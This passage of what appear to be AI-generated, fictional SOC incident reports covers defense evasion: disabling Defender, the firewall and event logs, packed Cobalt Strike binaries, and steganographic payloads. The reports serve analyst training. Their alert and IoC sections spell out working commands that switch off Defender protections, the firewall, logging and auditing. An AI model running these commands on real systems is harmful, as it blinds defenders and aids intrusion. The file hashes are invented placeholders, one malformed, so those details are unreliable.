User unaware of policy.
6. Business Impact:
Operational Impact: None.
Data Exposure: None (user tested on own system).
7. Remediation & Prevention:
Completed Actions:
Policy violation documented.
User educated.
Technical Controls Enhanced:
Implemented application control to block hacking tools.
Enhanced monitoring for tool downloads.
8. Conclusion:
A user downloaded and used unauthorized hacking tools, then attempted to cover tracks by deleting evidence. CrowdStrike detected the mass file deletion. The user was counseled, and application control was implemented.
Closure Rationale: Policy violation addressed; user educated; controls enhanced.
Analyst: [Your Name], SOC Analyst Date: 2024-03-07 17:30 EST
145. T1562.001 – Disable or Modify Tools (Microsoft Defender Detection)
Microsoft Defender Alert Details
Alert ID: MD-DISABLE-TOOLS-1562-7842 Alert Time: 2024-03-07 10:30:22 EST Severity: CRITICAL (96/100) Source: Microsoft Defender for Endpoint Rule: “Tampering with Security Tools Detected” MITRE ATT&CK: T1562.001 – Impair Defenses: Disable or Modify Tools
Alert Details:
Detection: Attempt to disable multiple security tools on domain controller
Host: DC-01 (Primary Domain Controller) User: SYSTEM (via compromised admin account) Time: 10:15-10:30 EST
Commands Executed (from process creation):
Disable Windows Defender:
10:15:22 – powershell Set-MpPreference -DisableRealtimeMonitoring $true
10:15:45 – powershell Set-MpPreference -DisableBehaviorMonitoring $true
10:16:12 – powershell Set-MpPreference -DisableBlockAtFirstSeen $true
10:16:38 – powershell Set-MpPreference -DisableIOAVProtection $true
10:17:05 – powershell Add-MpPreference -ExclusionPath C:\Windows\Temp
10:17:33 – powershell Add-MpPreference -ExclusionProcess cmd.exe
Disable Windows Firewall:
10:18:01 – netsh advfirewall set allprofiles state off
Stop Security Services:
10:18:28 – sc stop WinDefend
10:18:55 – sc stop Sense (Microsoft Defender ATP)
10:19:22 – sc stop WdNisSvc (Network Inspection)
10:19:48 – sc stop MpsSvc (Firewall)
Disable Event Logging:
10:20:15 – wevtutil set-log Security /enabled:false
10:20:42 – wevtutil set-log System /enabled:false
10:21:08 – wevtutil set-log Application /enabled:false
Disable Audit Policies:
10:21:35 – auditpol /set /category:* /success:disable /failure:disable
Process Details:
Process: psexec.exe from compromised admin workstation
Source IP: 185.143.221[.]89
Account: jwilson (domain admin, compromised)
Detection Logic:
Multiple commands to disable security tools
Defender settings modified (real-time monitoring off, exclusions added)
Firewall disabled
Security services stopped
Event logging and audit policies disabled
Pattern matches attacker disabling defenses before ransomware
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Defender alerts
Microsoft 365 Defender
Confirmed defense disablement on DC
2. Immediate Action
Isolate DC-01
CrowdStrike, Network ACLs
DC-01 quarantined
3. Re-enable Defenses
Re-enable all security tools
PowerShell, Group Policy
Defender, Firewall, logging re-enabled
4. Account Remediation
Disable compromised admin account
Azure AD, AD
jwilson account disabled; password reset
5. Network Block
Block attacker IP
Palo Alto
185.143.221[.]89 blocked
6. Incident Response
Activate emergency response
Management, Legal
Potential ransomware prep
Jira Incident Report
Ticket: SOC-2024-185 Summary: T1562.001 – Attacker Disables Security Tools on Domain Controller Status: RESOLVED Resolution: MALICIOUS – Defenses Restored Priority: P1 – CRITICAL Labels: T1562, disable-tools, defender-tampering, domain-controller, compromised-admin Components: Endpoint-Security, Identity-Management
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Endpoint.
Alert: “Tampering with Security Tools Detected”.
Host: DC-01 (Primary Domain Controller).
Actions: Defender, Firewall, logging, audit policies disabled.
Time: 2024-03-07 10:30 EST.
Technique: MITRE ATT&CK T1562.001 – Impair Defenses: Disable or Modify Tools.
2. Technical Analysis:
Attack Chain:
09:30 – jwilson (domain admin) account compromised via phishing
09:45 – Attacker logs into admin workstation via RDP
10:00 – Attacker uses psexec to push script to DC-01
10:15-10:30 – Defense disablement commands executed
10:30 – Defender detects tampering
Defenses Disabled:
Windows Defender: Real-time monitoring off, behavior monitoring off, exclusions added (Temp, cmd.exe)
Windows Firewall: Completely disabled
Security Services: WinDefend, Sense (ATP), WdNisSvc, MpsSvc stopped
Event Logging: Security, System, Application logs disabled
Audit Policies: All success/failure auditing disabled
Attacker Intent:
Prepare for ransomware deployment
Prevent detection during encryption
Disable logging to cover tracks
Disable firewall to allow C2 communication
Compromised Admin:
jwilson (Domain Admin)
No MFA (now enforced)
3. Investigation Findings:
Timeline:
09:30 – Admin account compromised
09:45 – Attacker logs in
10:00 – Access to DC
10:15-10:30 – Defense disablement
10:30 – Alert
10:32 – SOC investigates
10:33 – DC isolated
10:34 – Defenses re-enabled
10:35 – Admin account disabled
Indicators of Compromise (IoCs):
Commands:
– Set-MpPreference -DisableRealtimeMonitoring $true
– Set-MpPreference -DisableBehaviorMonitoring $true
– Add-MpPreference -ExclusionPath C:\Windows\Temp
– netsh advfirewall set allprofiles state off
– sc stop WinDefend
– sc stop Sense
– wevtutil set-log Security /enabled:false
– auditpol /set /category:* /success:disable /failure:disable
Account:
– jwilson (compromised)
Network:
– Attacker IP: 185.143.221[.]89
4. Containment Actions:
Immediate Actions:
Isolated DC-01.
Re-enabled all Defender settings.
Restarted security services.
Re-enabled Windows Firewall.
Re-enabled event logs.
Re-enabled audit policies.
Disabled jwilson account.
Reset password.
Blocked attacker IP.
Domain-Wide Actions:
Verified no other DCs affected.
Checked for ransomware (none found).
Rotated krbtgt password (precaution).
Host Remediation:
Full scan (clean).
Verified no persistence.
5. Root Cause Analysis:
Primary Cause: Domain admin account compromised via phishing.
Contributing Factors:
No MFA on admin account.
Admin had access to DC.
6. Business Impact:
Operational Impact: DC offline for 10 minutes (isolation and restoration).
Security Impact: Defenses down for 15 minutes; no ransomware executed.
7. Remediation & Prevention:
Completed Actions:
Defenses restored.
Admin account secured.
Attacker blocked.
Technical Controls Enhanced:
Enforced MFA for all admins.
Moved admin access behind VPN only.
Implemented Privileged Access Workstations.
Created alert for defense disablement attempts.
Enabled tamper protection in Defender.
8. Conclusion:
An attacker compromised a domain admin account and systematically disabled security defenses on the domain controller, preparing for ransomware deployment. Defender detected the tampering and enabled rapid restoration before any encryption could occur.
Closure Rationale: Defenses restored; admin account secured; ransomware prevented.
Analyst: [Your Name], SOC Analyst Date: 2024-03-07 11:30 EST
End of Batch 29
Ready for your next batch of prompts whenever you are.
Batch 30: Defense Evasion & Obfuscation Incident Reports
Here are the next 5 detailed SOC incident reports.
146. T1562.002 – Disable Windows Event Logging (Splunk Detection)
Splunk Alert Details
Alert ID: SPLUNK-DISABLE-LOGGING-1562-7842 Alert Time: 2024-03-08 09:30:15 EST Severity: CRITICAL (95/100) Source: Splunk Enterprise Security Rule: “Windows Event Logging Disabled – Defense Evasion” MITRE ATT&CK: T1562.002 – Impair Defenses: Disable Windows Event Logging
Alert Details:
Correlated Events:
Windows Event ID 1102 (Security Log Cleared) – Not present because logging disabled first
Event ID 104 (System Log Cleared) – Not present
Event ID 4719 (Audit Policy Change):
Time: 09:20:22 EST
Host: DC-01 (Domain Controller)
User: SYSTEM (via script)
Changes: “Audit Policy Change: Success Removed, Failure Removed” for multiple categories
Event ID 4904 (Audit Log Removed):
Time: 09:21:15 EST
Host: DC-01
Description: “An attempt to remove the audit log was made.”
Process Creation (Event ID 4688):
Time: 09:18:45 EST
Process: wevtutil.exe
Command: wevtutil set-log Security /enabled:false /retention:false /maxsize:1
Command: wevtutil set-log System /enabled:false
Command: wevtutil set-log Application /enabled:false
Command: wevtutil set-log “Windows PowerShell” /enabled:false
Additional Commands:
09:19:10 – auditpol /set /subcategory:”Security State Change” /success:disable /failure:disable
09:19:30 – auditpol /set /subcategory:”Other System Events” /success:disable /failure:disable
09:19:50 – auditpol /set /subcategory:”Logon” /success:disable /failure:disable
Detection Logic:
Event logs disabled via wevtutil (critical defense evasion)
Audit policies disabled via auditpol
No subsequent log events from the host (logging off)
Pattern matches attacker preparing to operate without detection
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Splunk correlation
Splunk ES
Confirmed event logging disabled on DC-01
2. Process Investigation
Identify source of commands
CrowdStrike Falcon
PsExec from compromised admin workstation
3. Immediate Action
Isolate DC-01
CrowdStrike, Network ACLs
DC-01 quarantined
4. Re-enable Logging
Enable event logs and audit policies
wevtutil, auditpol
All logs re-enabled
5. Account Remediation
Disable compromised admin account
Azure AD, AD
Admin account disabled; password reset
6. Network Block
Block attacker IP
Palo Alto
185.143.221[.]89 blocked
Jira Incident Report
Ticket: SOC-2024-186 Summary: T1562.002 – Windows Event Logging Disabled on Domain Controller Status: RESOLVED Resolution: MALICIOUS – Logging Restored Priority: P1 – CRITICAL Labels: T1562, disable-logging, wevtutil, auditpol, domain-controller Components: Log-Management, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Splunk Enterprise Security.
Alert: “Windows Event Logging Disabled – Defense Evasion”.
Host: DC-01 (Primary Domain Controller).
Actions: Security, System, Application, PowerShell logs disabled; audit policies disabled.
Time: 2024-03-08 09:30 EST.
Technique: MITRE ATT&CK T1562.002 – Impair Defenses: Disable Windows Event Logging.
2. Technical Analysis:
Attack Chain:
08:30 – Admin account (bjones) compromised via phishing
08:45 – Attacker logs into admin workstation via RDP
09:00 – Attacker uses PsExec to push commands to DC-01
09:18-09:21 – Event logging disabled
09:21 – No further logs generated
09:30 – Splunk alert (based on audit policy changes and process creation)
Logging Disabled:
wevtutil commands: Disabled Security, System, Application, PowerShell logs
auditpol commands: Disabled auditing for critical categories (Logon, Security State Change, etc.)
Result: No events recorded after 09:21
Attacker Intent:
Operate without leaving traces
Prepare for ransomware or data theft
Prevent detection of further actions
Compromised Admin:
bjones (Domain Admin)
No MFA (now enforced)
3. Investigation Findings:
Timeline:
08:30 – Admin account compromised
08:45 – Attacker logs in
09:00 – PsExec to DC
09:18-09:21 – Logging disabled
09:30 – Alert
09:32 – SOC investigates
09:33 – DC isolated
09:34 – Logging re-enabled
Indicators of Compromise (IoCs):
Commands:
– wevtutil set-log Security /enabled:false
– wevtutil set-log System /enabled:false
– wevtutil set-log Application /enabled:false
– wevtutil set-log “Windows PowerShell” /enabled:false
– auditpol /set /subcategory:”Logon” /success:disable /failure:disable
– (similar for other subcategories)
Account:
– bjones (compromised)
4. Containment Actions:
Immediate Actions:
Isolated DC-01.
Re-enabled all event logs via wevtutil.
Re-enabled audit policies via auditpol.
Restarted Windows Event Log service.
Disabled bjones account.
Reset password.
Blocked attacker IP.
Verification:
Confirmed logs are being written again.
Reviewed available logs for attacker activity (none after disable).
Host Remediation:
Full scan (clean).
Verified no persistence.
5. Root Cause Analysis:
Primary Cause: Domain admin account compromised via phishing.
Contributing Factors:
No MFA on admin account.
Admin had access to DC.
6. Business Impact:
Operational Impact: DC offline for 15 minutes.
Forensic Impact: Gap in logs from 09:21 to 09:34 (13 minutes).
7. Remediation & Prevention:
Completed Actions:
Logging restored.
Account secured.
Attacker blocked.
Technical Controls Enhanced:
Enforced MFA for all admins.
Moved admin access behind VPN only.
Created alert for wevtutil and auditpol usage.
Enabled advanced audit policies to log changes to logging settings.
8. Conclusion:
An attacker compromised a domain admin account and disabled event logging and audit policies on the domain controller, creating a blind spot. Splunk detected the configuration changes and enabled rapid restoration, limiting the logging gap to 13 minutes.
Closure Rationale: Logging restored; account secured; attacker blocked.
Analyst: [Your Name], SOC Analyst Date: 2024-03-08 10:30 EST
147. T1562.004 – Disable or Modify System Firewall (Palo Alto Detection)
Palo Alto Alert Details
Alert ID: PAN-DISABLE-FIREWALL-1562-7842 Alert Time: 2024-03-08 14:15:33 EST Severity: CRITICAL (96/100) Source: Palo Alto Networks Firewall + Cortex XDR Rule: “Windows Firewall Disabled – Potential Defense Evasion” MITRE ATT&CK: T1562.004 – Impair Defenses: Disable or Modify System Firewall
Alert Details:
Detection: Windows Firewall disabled on multiple critical servers
Affected Hosts:
SQL-SRV-01 (SQL Server)
WEB-SRV-01 (Web Server)
FILESRV-01 (File Server)
DC-01 (Domain Controller) Time: 14:00-14:15 EST
Events (from Cortex XDR):
Host: SQL-SRV-01
14:05:22 – Command: netsh advfirewall set allprofiles state off
14:05:25 – Registry: HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall set to 0
14:05:28 – Service: MpsSvc (Windows Firewall) stopped
Host: WEB-SRV-01
14:07:45 – Command: netsh advfirewall set allprofiles state off
14:07:48 – Registry modified
14:07:50 – Service stopped
Host: FILESRV-01
14:10:12 – Same pattern
Host: DC-01
14:12:38 – Same pattern
Source of Commands:
All commands originated from compromised admin workstation (192.168.45.78)
Using PsExec to execute on each server
Attacker IP (external): 185.143.221[.]89 (connected to admin workstation)
Detection Logic:
Windows Firewall disabled on multiple critical servers
Pattern matches attacker preparing for lateral movement or ransomware
Firewall disabled allows unrestricted C2 communication
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Palo Alto/Cortex alerts
Cortex XDR
Confirmed firewall disabled on 4 servers
2. Immediate Action
Isolate compromised admin workstation
CrowdStrike
Admin workstation quarantined
3. Re-enable Firewall
Enable firewall on all affected servers
PowerShell (Invoke-Command)
Firewall re-enabled on all 4 servers
4. Account Remediation
Disable compromised admin account
Azure AD, AD
Admin account disabled; password reset
5. Network Block
Block attacker IP
Palo Alto
185.143.221[.]89 blocked
6. Verification
Confirm firewall status
PowerShell
All firewalls enabled and active
Jira Incident Report
Ticket: SOC-2024-187 Summary: T1562.004 – Windows Firewall Disabled on 4 Critical Servers Status: RESOLVED Resolution: MALICIOUS – Firewall Restored Priority: P1 – CRITICAL Labels: T1562, disable-firewall, netsh, defense-evasion, compromised-admin Components: Network-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Palo Alto Cortex XDR.
Alert: “Windows Firewall Disabled – Potential Defense Evasion”.
Hosts: SQL-SRV-01, WEB-SRV-01, FILESRV-01, DC-01.
Action: Windows Firewall disabled via netsh.
Time: 2024-03-08 14:15 EST.
Technique: MITRE ATT&CK T1562.004 – Impair Defenses: Disable or Modify System Firewall.
2. Technical Analysis:
Attack Chain:
13:30 – Admin account (kwilson) compromised via phishing
13:45 – Attacker logs into admin workstation via RDP
13:50 – Attacker enumerates critical servers
14:00-14:15 – Uses PsExec to disable firewall on each server
14:15 – Cortex XDR detects
Firewall Disablement:
Command: netsh advfirewall set allprofiles state off
Registry: HKLM\…\EnableFirewall set to 0
Service: MpsSvc stopped
Result: All inbound/outbound traffic allowed
Attacker Intent:
Allow unrestricted C2 communication
Enable lateral movement without restrictions
Prepare for ransomware deployment
Compromised Admin:
kwilson (Domain Admin)
No MFA (now enforced)
3. Investigation Findings:
Timeline:
13:30 – Admin account compromised
13:45 – Attacker logs in
13:50 – Server enumeration
14:00-14:15 – Firewall disablement
14:15 – Alert
14:17 – SOC investigates
14:18 – Admin workstation isolated
14:19 – Firewall re-enabled on all servers
Indicators of Compromise (IoCs):
Commands:
– netsh advfirewall set allprofiles state off
– sc stop MpsSvc
Registry:
– HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = 0
Account:
– kwilson (compromised)
4. Containment Actions:
Immediate Actions:
Isolated compromised admin workstation.
Re-enabled firewall on all 4 servers using PowerShell (Invoke-Command).
Restarted MpsSvc service.
Verified firewall status.
Disabled kwilson account.
Reset password.
Blocked attacker IP.
Verification:
Confirmed firewall active on all servers.
No persistent changes found.
Host Remediation:
Full scan on admin workstation (clean).
Reimaged as precaution.
5. Root Cause Analysis:
Primary Cause: Admin account compromised via phishing.
Contributing Factors:
No MFA on admin account.
Admin had access to critical servers.
6. Business Impact:
Operational Impact: Servers exposed for ~15 minutes.
Data Exposure: No evidence of data theft.
7. Remediation & Prevention:
Completed Actions:
Firewall restored.
Account secured.
Attacker blocked.
Technical Controls Enhanced:
Enforced MFA for all admins.
Moved admin access behind VPN only.
Created alert for firewall disablement.
Implemented change management for firewall rules.
8. Conclusion:
An attacker compromised an admin account and disabled Windows Firewall on four critical servers to pave the way for further attacks. Cortex XDR detected the changes, enabling rapid restoration. No data was exfiltrated.
Closure Rationale: Firewall restored; account secured; attacker blocked.
Analyst: [Your Name], SOC Analyst Date: 2024-03-08 15:30 EST
148. T1027.001 – Binary Packing (FortiSandbox Detection)
FortiSandbox Alert Details
Alert ID: FORTI-BINARY-PACK-1027-7842 Alert Time: 2024-03-08 11:30:22 EST Severity: HIGH (88/100) Source: Fortinet FortiSandbox Rule: “Packed Binary Detected – Multiple Packers Used” MITRE ATT&CK: T1027.001 – Obfuscated Files or Information: Binary Packing
Alert Details:
File Analysis Report:
File Name: update_installer.exe
File Size: 1.2 MB (unpacked size: 4.8 MB)
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Source: Email attachment to engineering@company.com
Submission Time: 11:15 EST
Packing Analysis:
Detected packer: UPX (Ultimate Packer for Executables) – version 3.96
Detected packer: Themida (commercial protector) – secondary layer
Entropy: 7.98 (very high, indicates packed/encrypted)
Packing ratio: 75% compressed (1.2 MB vs 4.8 MB unpacked)
Unpacking Process (FortiSandbox emulation):
Layer 1: UPX unpacked (custom UPX with modified header)
Layer 2: Themida anti-debugging checks, decrypted final payload
Final payload: Cobalt Strike beacon (SHA256: b2c3d4e5…)
Behavior After Unpacking:
Connected to 185.143.221[.]89:443
Injected into explorer.exe
Established persistence via scheduled task
Detection Logic:
Multiple packers detected (UPX + Themida)
High entropy (indicates encrypted/compressed)
Unpacked payload identified as Cobalt Strike
Pattern matches advanced malware obfuscation
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify FortiSandbox analysis
FortiSandbox Console
Confirmed packed binary (UPX+Themida)
2. Email Investigation
Find source email
Proofpoint, Exchange
Email to engineering@company.com from spoofed vendor
3. Quarantine Email
Block and remove email
Proofpoint
Email quarantined from all mailboxes
4. User Check
Verify if user executed file
CrowdStrike
User did not open attachment (alert before execution)
5. IOC Distribution
Block C2 IP and domain
Palo Alto, Cisco Umbrella
185.143.221[.]89 blocked
6. Threat Hunting
Check for similar packed files
FortiSandbox, Splunk
No other occurrences found
Jira Incident Report
Ticket: SOC-2024-188 Summary: T1027.001 – Packed Malware (UPX+Themida) Delivered via Email Status: RESOLVED Resolution: MALICIOUS – Blocked Before Execution Priority: P2 – MEDIUM Labels: T1027, binary-packing, upx, themida, fortisandbox, phishing Components: Email-Security, Malware-Analysis
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Fortinet FortiSandbox.
Alert: “Packed Binary Detected – Multiple Packers Used”.
File: update_installer.exe (email attachment).
Target: Engineering Department.
Time: 2024-03-08 11:30 EST.
Technique: MITRE ATT&CK T1027.001 – Obfuscated Files or Information: Binary Packing.
2. Technical Analysis:
Attack Chain:
11:10 – Email sent from “vendor@software-update[.]net”
11:11 – Email delivered to engineering@company.com
11:12 – FortiSandbox analyzes attachment (inline)
11:15 – Analysis begins
11:20 – Packing detected
11:25 – Unpacking successful, payload identified
11:30 – Alert triggers
11:31 – Email quarantined
Packing Analysis:
Layer 1 (UPX): Standard packer, but with modified header to evade signature detection
Layer 2 (Themida): Commercial protector with anti-debugging, anti-sandbox, and encryption
Entropy: 7.98 (maximum is 8.0) – clear indicator of packing
Unpacked Size: 4.8 MB (original PE)
Final Payload:
Type: Cobalt Strike beacon
SHA256: b2c3d4e5…
C2: 185.143.221[.]89:443
Capabilities: Remote access, keylogging, file exfiltration
Email Details:
Sender: vendor@software-update[.]net
Subject: “Critical Security Update – Install Immediately”
Attachment: update_installer.exe
3. Investigation Findings:
Timeline:
11:10 – Email sent
11:11 – Email delivered
11:12-11:30 – FortiSandbox analysis
11:30 – Alert triggers
11:31 – Email quarantined
11:32 – SOC investigates
11:35 – User confirmed (no execution)
Indicators of Compromise (IoCs):
File:
– update_installer.exe (SHA256: a1b2c3d4…)
– Unpacked Cobalt Strike (SHA256: b2c3d4e5…)
Network:
– C2: 185.143.221[.]89:443
Packers:
– UPX (modified)
– Themida
Email:
– Sender: vendor@software-update[.]net
– Subject: “Critical Security Update – Install Immediately”
4. Containment Actions:
Immediate Actions:
Quarantined email from all mailboxes.
Blocked C2 IP at firewall and proxy.
Added file hashes to blocklists.
User Notification:
Engineering team alerted to campaign.
No user action needed (email not opened).
Email Rule Update:
Created Proofpoint rule to block .exe attachments.
Enhanced filtering for update-themed emails.
5. Root Cause Analysis:
Primary Cause: External attacker sending packed malware via email.
Contributing Factors:
.exe attachments allowed (now blocked).
No user execution (prevented by sandbox).
6. Business Impact:
Operational Impact: None.
Data Exposure: None (email not opened).
7. Remediation & Prevention:
Completed Actions:
Email quarantined.
IOCs blocked.
Users notified.
Technical Controls Enhanced:
Blocked all .exe attachments via email gateway.
Enabled FortiSandbox inline analysis for all emails.
Created alert for high-entropy/packed files.
8. Conclusion:
A sophisticated malware used multiple packers (UPX and Themida) to obfuscate its payload and evade signature-based detection. FortiSandbox detected the packing and unpacked the file, revealing a Cobalt Strike beacon. The email was quarantined before any user could open it.
Closure Rationale: Malware blocked; IOCs added; email policy updated.
Analyst: [Your Name], SOC Analyst Date: 2024-03-08 12:30 EST
149. T1027.002 – Software Packing (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-SOFTWARE-PACK-1027-7842 Alert Time: 2024-03-08 16:30:45 EST Severity: HIGH (85/100) Source: CrowdStrike Falcon EDR Rule: “Packed Process Detected – Obfuscated Code in Memory” MITRE ATT&CK: T1027.002 – Obfuscated Files or Information: Software Packing
Alert Details:
Detection: Process with packed/obfuscated code detected in memory
Host: DEV-WS-089 (Development Workstation) User: rpatel@company.com (Raj Patel, Engineer) Process: C:\Users\rpatel\Downloads\dev_tool.exe (PID: 4789) Time: 16:25 EST
Memory Analysis:
Process memory has high entropy (7.9)
Sections: .text, .data, .rdata are packed/encrypted
Expected for unpacked PE: entropy ~5.0-6.0
Packer signature: ASPack (detected)
Behavioral Analysis:
Process allocated memory with write and execute permissions (RWX)
Wrote decrypted code to new memory region
Transferred execution to decrypted code
Connected to 185.143.221[.]89:443
Detection Logic:
High entropy in process memory (indicates packed code)
RWX memory allocation (unusual for legitimate software)
Self-modifying code (decryption at runtime)
Pattern matches packed malware
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify CrowdStrike alert
CrowdStrike Falcon Console
Confirmed packed process (ASPack)
2. Process Investigation
Analyze memory
CrowdStrike Falcon Memory
Unpacked Cobalt Strike beacon
3. User Interview
Contact rpatel
Teams, Phone
User downloaded “tool” from forum; unaware
4. Immediate Action
Terminate process
CrowdStrike
Process killed
5. Host Isolation
Isolate DEV-WS-089
CrowdStrike
Host quarantined
6. Account Remediation
Disable rpatel account
Azure AD, AD
Account disabled; password reset
Jira Incident Report
Ticket: SOC-2024-189 Summary: T1027.002 – Packed Malware (ASPack) Executed on Development Workstation Status: RESOLVED Resolution: MALICIOUS – Process Terminated Priority: P2 – MEDIUM Labels: T1027, software-packing, aspack, crowdstrike, user-error Components: Endpoint-Security, Malware-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Packed Process Detected – Obfuscated Code in Memory”.
Host: DEV-WS-089 (Development, user rpatel).
Process: C:\Users\rpatel\Downloads\dev_tool.exe.
Packer: ASPack.
Time: 2024-03-08 16:30 EST.
Technique: MITRE ATT&CK T1027.002 – Obfuscated Files or Information: Software Packing.
2. Technical Analysis:
Attack Chain:
16:00 – User downloads “developer tool” from forum
16:05 – Executes dev_tool.exe
16:10 – Packed process runs, unpacks in memory
16:15 – Unpacked payload (Cobalt Strike) connects to C2
16:25 – CrowdStrike detects
Packing Details:
Packer: ASPack (popular executable packer)
Entropy: 7.9 in process memory (highly packed)
Unpacking: Process allocated RWX memory, decrypted payload, jumped to it
Unpacked Payload:
Type: Cobalt Strike beacon
C2: 185.143.221[.]89:443
Capabilities: Remote access, keylogging, file exfiltration
User Intent:
User thought it was legitimate tool
Unaware of malware
3. Investigation Findings:
Timeline:
16:00 – Tool downloaded
16:05 – Executed
16:10-16:15 – Unpacking and C2
16:25 – Alert
16:27 – SOC investigates
16:28 – Process terminated
16:29 – Host isolated
Indicators of Compromise (IoCs):
Files:
– C:\Users\rpatel\Downloads\dev_tool.exe (SHA256: a1b2c3d4…)
Process Memory:
– High entropy (7.9)
– RWX allocation
Network:
– C2: 185.143.221[.]89:443
4. Containment Actions:
Immediate Actions:
Terminated dev_tool.exe process.
Isolated host.
Disabled rpatel account.
Reset password.
Blocked C2 IP.
Host Remediation:
Full scan (clean).
Reimaged as precaution.
User Education:
Counseled on downloading untrusted software.
5. Root Cause Analysis:
Primary Cause: User downloaded and executed untrusted software.
Contributing Factors:
No application control.
User unaware of packing risks.
6. Business Impact:
Operational Impact: Development workstation offline for 2 hours.
Data Exposure: None (C2 blocked).
7. Remediation & Prevention:
Completed Actions:
Malware terminated.
Account secured.
User educated.
Technical Controls Enhanced:
Enabled application control.
Enhanced monitoring for packed processes.
8. Conclusion:
A user downloaded a packed executable that unpacked in memory and connected to C2. CrowdStrike detected the packed process and enabled rapid termination.
Closure Rationale: Malware terminated; account secured; user educated.
Analyst: [Your Name], SOC Analyst Date: 2024-03-08 17:30 EST
150. T1027.003 – Steganography (FortiSandbox Detection)
FortiSandbox Alert Details
Alert ID: FORTI-STEGO-1027-7842 Alert Time: 2024-03-08 10:30:22 EST Severity: HIGH (88/100) Source: Fortinet FortiSandbox Rule: “Steganography Detected – Hidden Payload in Image” MITRE ATT&CK: T1027.003 – Obfuscated Files or Information: Steganography
Alert Details:
File Analysis Report:
File Name: conference_photo.jpg
File Size: 2.3 MB
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Source: Email attachment to marketing@company.com
Submission Time: 10:15 EST
Steganography Analysis:
File appears to be a normal JPG image (conference photo)
LSB (Least Significant Bit) analysis revealed hidden data
Hidden data extracted: 256 KB executable (payload.exe)
Extraction method: LSB steganography (1 bit per pixel)
Extracted Payload:
File: payload.exe
SHA256: b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1
Type: Cobalt Strike loader
Image Analysis:
Original image: legitimate conference photo from public source
Hidden data embedded in pixels (imperceptible to human eye)
MD5 of image before embedding: 7a8b9c0d…
MD5 after embedding: a1b2c3d4… (different, but looks identical)
Detection Logic:
Statistical analysis showed anomalous LSB patterns
Hidden executable detected
Image entropy higher than normal JPG
Pattern matches steganography for malware delivery
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify FortiSandbox analysis
FortiSandbox Console
Confirmed steganography in image
2. Email Investigation
Find source email
Proofpoint, Exchange
Email to marketing@company.com from “conference@event.org”
3. Quarantine Email
Block and remove email
Proofpoint
Email quarantined from all mailboxes
4. User Check
Verify if user opened image
CrowdStrike
User did not open attachment (alert before execution)
5. IOC Distribution
Block C2 IP and hashes
Palo Alto, Cisco Umbrella
185.143.221[.]89 blocked; hashes added
6. Threat Hunting
Check for similar images
FortiSandbox, Splunk
No other occurrences found
Jira Incident Report
Ticket: SOC-2024-190 Summary: T1027.003 – Steganography: Malware Hidden in Conference Photo Status: RESOLVED Resolution: MALICIOUS – Blocked Before Execution Priority: P2 – MEDIUM Labels: T1027, steganography, image-hidden, fortisandbox, phishing Components: Email-Security, Malware-Analysis
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Fortinet FortiSandbox.
Alert: “Steganography Detected – Hidden Payload in Image”.
File: conference_photo.jpg (email attachment).
Target: Marketing Department.
Time: 2024-03-08 10:30 EST.
Technique: MITRE ATT&CK T1027.003 – Obfuscated Files or Information: Steganography.
2. Technical Analysis:
Attack Chain:
10:10 – Email sent from “conference@event.org”
10:11 – Email delivered to marketing@company.com
10:12 – FortiSandbox analyzes attachment (inline)
10:15 – Analysis begins
10:20 – Steganography detected
10:25 – Hidden payload extracted
10:30 – Alert triggers
10:31 – Email quarantined
Steganography Details:
Method: LSB (Least Significant Bit) encoding
Cover Image: Legitimate conference photo (public source)
Hidden Data: 256 KB executable (payload.exe)
Extraction: 1 bit per pixel, 2.3 MB image yields ~256 KB hidden data
Hidden Payload:
File: payload.exe
SHA256: b2c3d4e5…
Type: Cobalt Strike loader
C2: 185.143.221[.]89:443
Email Details:
Sender: conference@event.org (spoofed)
Subject: “Photos from Industry Conference 2024”
Attachment: conference_photo.jpg
3. Investigation Findings:
Timeline:
10:10 – Email sent
10:11 – Email delivered
10:12-10:30 – FortiSandbox analysis
10:30 – Alert triggers
10:31 – Email quarantined
10:32 – SOC investigates
10:35 – User confirmed (no execution)
Indicators of Compromise (IoCs):
File:
– conference_photo.jpg (SHA256: a1b2c3d4…)
– payload.exe (extracted, SHA256: b2c3d4e5…)
Network:
– C2: 185.143.221[.]89:443
Email:
– Sender: conference@event.org
– Subject: “Photos from Industry Conference 2024”
4. Containment Actions:
Immediate Actions:
Quarantined email from all mailboxes.
Blocked C2 IP at firewall and proxy.
Added file hashes to blocklists.
User Notification:
Marketing team alerted to campaign.
No user action needed (email not opened).
Email Rule Update:
Enhanced filtering for image attachments.
Added steganography detection to email gateway.
5. Root Cause Analysis:
Primary Cause: External attacker using steganography to hide malware in image.
Contributing Factors:
Image attachments allowed (now scrutinized).
No user execution (prevented by sandbox).
6. Business Impact:
Operational Impact: None.
Data Exposure: None (email not opened).
7. Remediation & Prevention:
Completed Actions:
Email quarantined.
IOCs blocked.
Users notified.
Technical Controls Enhanced:
Enhanced FortiSandbox steganography detection.
Created alert for images with embedded data.
Added LSB analysis to email security.
8. Conclusion:
An attacker used steganography to hide a Cobalt Strike loader inside a seemingly innocent conference photo. FortiSandbox detected the hidden payload and enabled blocking before any user could open the image.
Closure Rationale: Malware blocked; IOCs added; email policy enhanced.
Analyst: [Your Name], SOC Analyst Date: 2024-03-08 11:30 EST
End of Batch 30
